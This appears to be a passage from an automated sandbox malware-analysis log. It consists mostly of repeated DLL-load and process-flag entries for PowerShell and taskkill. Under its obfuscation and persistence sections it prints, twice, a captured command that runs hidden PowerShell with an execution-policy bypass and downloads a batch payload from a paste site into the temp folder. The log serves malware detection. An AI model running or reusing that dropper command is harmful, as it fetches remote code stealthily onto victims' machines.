          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: version.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: mpr.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: framedynos.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: dbghelp.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: srvcli.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: netutils.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: winsta.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: amsi.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\taskkill.exe | Section loaded: profapi.dll
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

          Data Obfuscation

          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD9B7F00AD pushad ; iretd 4_2_00007FFD9B7F00C1

          Persistence and Installation Behavior

          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
          Source: C:\Windows\System32\cmd.exe | Process created: reg.exe

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exe  Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
